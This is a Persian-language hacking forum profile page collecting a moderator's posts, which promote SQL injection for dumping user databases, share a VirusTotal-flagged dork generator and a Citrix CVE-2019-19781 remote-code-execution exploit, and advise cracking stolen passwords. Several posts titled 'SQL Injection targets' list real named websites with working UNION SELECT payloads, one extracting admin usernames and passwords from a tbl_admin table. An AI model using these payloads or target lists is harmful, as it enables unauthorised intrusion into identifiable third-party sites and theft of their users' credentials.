mownten

مدير بخش
  • تعداد ارسال ها

    297
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    71

آخرین بار برد mownten در 25 بهمن

mownten یکی از رکورد داران بیشترین تعداد پسند مطالب است !

درباره mownten

  • درجه

  • تاریخ تولد تعیین نشده

آخرین بازدید کنندگان نمایه

3,146 بازدید کننده نمایه
  1. سلام. در اینجا بیگم هر گونه توضیح یا تشریح جنبه آموزشی داره و هرگونه سوء استفاده بر عهده کاربر هست. شما اول سعی کنید تخصصتون توی sqli رو ببرید بالا. منظورم استفاده از ترفند ها و cheat sheet ها برای یادگیری انواع sqli هست. باید صبور باشید و وقت بذاری. اگر بخواید با sqlmap و havij و sqli hunter و غیره اقدام به sqli بکنید . بعد برید باگ های دیگه رو یاد بگیرید بعد من تعجب میکنم چطور میگین sqli بلدین. وقتی sqli رو بلد باشین، یعنی بلدین اطلاعات درون دیتابیس رو بکشین. مهاجم هم میره اطلاعات کاربران وبسایت رو میکشه بیرون و ذخیره میکنه. ممکنه پسوردها رمزنگاری شده باشن و ممکنه نشده باشن. وقتی یوزرنیم و پسورد به دستت میرسه میتونی اقدام به کرک بکنی. انجمن های کرک هم هستن که میتونی سر بزنی با عضو کانال های تلگرامیشون بشی. اونجا بهت یاد میدن چطوری از دیتاهایی که از دیتابیس کشیدی بیرون، استفاده کنی. موفق و موید
  2. پارت آخر: Dork Combine v1.2 by Volevanya [Guardiran.org].z05
  3. سلام مجدد خدمت اعضای محترم در اینجا هم ابزار Dork Combine v1.2 رو در اختیارتون میذارم که از ابزارهای مفید برای ساخت دورک هست. کار باهاش راحته. نرم افزار رو اجرا میکنید. Load Url رو میزنید و فایل متنی page perameters رو لود میکنید. بعد روی دکمه ی Paste Urls کلیک کنید تا وارد بخش پارامترها بشن. تیک Inurl رو بزنید و روی Gen Dorks کلیک کنید. می بینید که دورک ها ساخته میشن و با استفاده از دکمه ی Save میتونید بعنوان فهرست دورک ذخیره ش بکنید. اگر هم میخواید دامنه ای رو بهش اضافه بکنید تیک Site رو بزنید و توی کارد روبروش هر دامنه ای خواستید بنویسید. مثلا us. یا co.uk. یا il. یا هر چیز دیگه. ضمناً این ابزار مورد استفاده شخص خود من هست اما توسط virustotal با چهار ضریب خطر شناسایی شده. مسئولیت استفاده از این ابزار بر عهده کاربر هست. لینک اسکن: Virustotal - Dork Combine v1.2 رمز عبور : guardiran.org نکته: حجم کلی 25 مگ هست که به پنج پارت پنج مگابایتی تبدیلش کردم. Dork Combine v1.2 by Volevanya [Guardiran.org].zip Dork Combine v1.2 by Volevanya [Guardiran.org].z01 Dork Combine v1.2 by Volevanya [Guardiran.org].z02 Dork Combine v1.2 by Volevanya [Guardiran.org].z03 Dork Combine v1.2 by Volevanya [Guardiran.org].z04
  4. سلام بر همه ی کاربران گاردیران اینجا قصد دارم ابزار بررسی مسیرهای داخل یه فایل sql رو در اختیارتون قرار بدم. این مال مواقعی هست که یه دیتابیس دستتون هست و میخواین ببینین داخلش چی هست. توی حوزه ی گیم هکینگ هم حتی بدردتون میخوره. ویژگیهای ابزار: AllDir - search in subfolders. Detail - a detailed output of the results. رمز فایل فشرده : guardiran.org لینک اسکن: Virustotal SQL_info_byGuron [guardiran.org].zip
  5. mownten

    New in Guardiran

    .Hello and Thanks for joining us ?Would you please clear what do you mean of most powerful and the only hacker group ?I mean in which section do you expertise
  6. سلام قابلیت تعویض پسورد ویندوز وجود داره ولی مشاهده خیر. میتونید از ابزار کرک برای کرک پسورد استفاده کنید. توی یه فایل به نام SAM ذخیره میشه.
  7. سلام روز بخیر. طی روزهای اخیر یک آسیب پذیری جدی از سرورهای مبتنی بر Citrix با کد cve 2019 19781 یافت شده که سطح بالایی از خطر رو دارا هست. در اینجا یک ویدیوی آموزشی در مورد استفاده از این اکسپلویت خدمتتون تقدیم میکنم. فرایند حمله: یافتن یک سرور مبتنی Citrix و IP آن استفاده از توزیع های لینکس (پیشنهادی) برای راحتی در حمله نیازمندیهای اکسپلویت: requests و netaddr در این حمله میتوانید اطلاعات یوزرهای روی سرور را به دست آورید. این اکسپلویت بصورت Remote کد را بر روی سرور اجرا میکند و خروجی را به شما می دهد. محتویات : ویدیو آموزشی + اکسپلویت رمز عبور: guardiran.org cve-2019-19781-master.zip cve-2019-19781-master.z01 cve-2019-19781-master.z02
  8. mownten

    اقدام از طرف guardiran

    دوست عزیز منظور شما از اقدام یا دیفیس اینه که حمله بکنیم به وبسایت های خارجی؟ خدمتتون عرض کنم که اولا قبل از هر دیفیس سیاسی میبایست هماهنگی با مدیران تیم انجام بشه چونکه بعدا مسئولیت هاش در ابعاد کوچک و بزرگ متوجه تیم و بخش مدیریتش میشه. دوما دیفیس مال سالها پیشه و مدت ها هست که از مد افتاده. علوم این حوزه خیلی پیشرفته تر شدن و شخص مهاجم بهتره به جای حمله هایی که جز گرفتن وقت چیز ددیگه ای در پیش نداره به افزایش و علم و اگاهی و تسلطش روی مهارتش بپردازه تا بتونه بعنوان یه شغل قبولش کنه. دیفیس برای آدم شغل ساز نیست. مهم پوله و اینکه از این دانش چطور بشه پول در آورد. شما ترجیح میدی سه سال از عمرت رو روی دیفیس 10هزار سایت خارجی بذاری یا مثلا به یادگیری پایتون و تحلیل داده بپردازی که بعدش بتونه رزومه سنگین بدی؟ بعضی اقدامات شاید برای وجهه ی تیم باشه ولی جلوی کسانی که جنگ دیفیس راه میندازن و توی سطح پایینی از عملیات هستن. سطح بالای عملیاتی فقط آموزش و یادگیری هست. امیدوارم حرفم رو واضح زده باشم. موفق و موید
  9. mownten

    اولین تجربه هک یا امنیتتون؟!؟

    سال 88 پیدا کردن یک باگ در بلوتوث HTC WILDFIRE S که به نوکیا گزارش دادم. اولین شل هم مربوط به باگ overflow توی پورت 445 یا 443 بود که یه ویدیو ازش درست کردم و گذاشتم توی بلاگفا و فیلتر شد و از دست رفت. از اولین آموزش های تصویری این مدلی توی سطح نت بود که انگشت شمار بهش تسلط داشتن. یک ساعت با سرعت 20کیلوبایت مینشستم تا متااسپلویت 2.3 با حجم 50 مگ دانلود بشه. اونم با دانلودر IE . هیع چه روزگاری.
  10. mownten

    تارگت های Sql Injection

    http://www.henmily.com/en/productlist.php?tid=15999999.9 union all select 1,2,3,4,5 http://www.coda-continuum.com/product/product.php?id=4999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 http://ssy.org/detail.php?id=' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 and '0'='1-- http://www.hk-waitat.com/web/product.php?cat=60999999.9 union all select 1,2,3 https://www.russianspares.com/products.php?cat=54999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16&page=10& http://www.nashgroup.co.in/product-detail.php?id=2999999.9 union all select 1,2,3,4,5,6,7 http://www.tomal.se/eng/prod.php?ID=64' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 and '0'='1-- http://www.natomusic.fr/artisans/jazz/artisans-detail.php?id=124' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 and '0'='1-- http://www.cronigsrealestate.com/?content=forsale.detail&id=72999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 http://www.primatigonglobal.co.id/index.php?mib=product&id=1&title=Precisetech http://dreamrivershinhan.com/zb/view.php?uid=1&startPage=1&boardid=zb_notice http://www.koyakorea.com/m_view.php?ps_db=notice&ps_boid=155999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 http://www.koracing.net/viewproduct.php?folder=5&product=18999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 http://www.scantechproducts.com/en/product-list/product-list.php?cat1=5' and 1 and '0'='1-- http://www.smtmax.com/category.php?id=2999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 http://nanoentek.com/product.php?id=' union all select 1,2,3,4,5,6,7,8,9,10,11,12 and '0'='1--
  11. mownten

    تارگت های Sql Injection

    https://www.hawkeyetack.com/product-list.php?cid=1 نام دیتابیس : HTproducts
  12. mownten

    تارگت های Sql Injection

    https://www.achromicpoint.com/past-event.php?id=50' and 1 and '0'='1-- https://www.achromicpoint.com/past-event.php?id=-50%27+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f61646d696e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+-
  13. mownten

    تارگت های Sql Injection

    https://www.achromicpoint.com/past-event.php?id=-50'+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+tbl_admin),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+-
  14. mownten

    تارگت های Sql Injection

    http://www.henmily.com/en/productlist.php?tid=15999999.9 union all select 1,2,3,4,5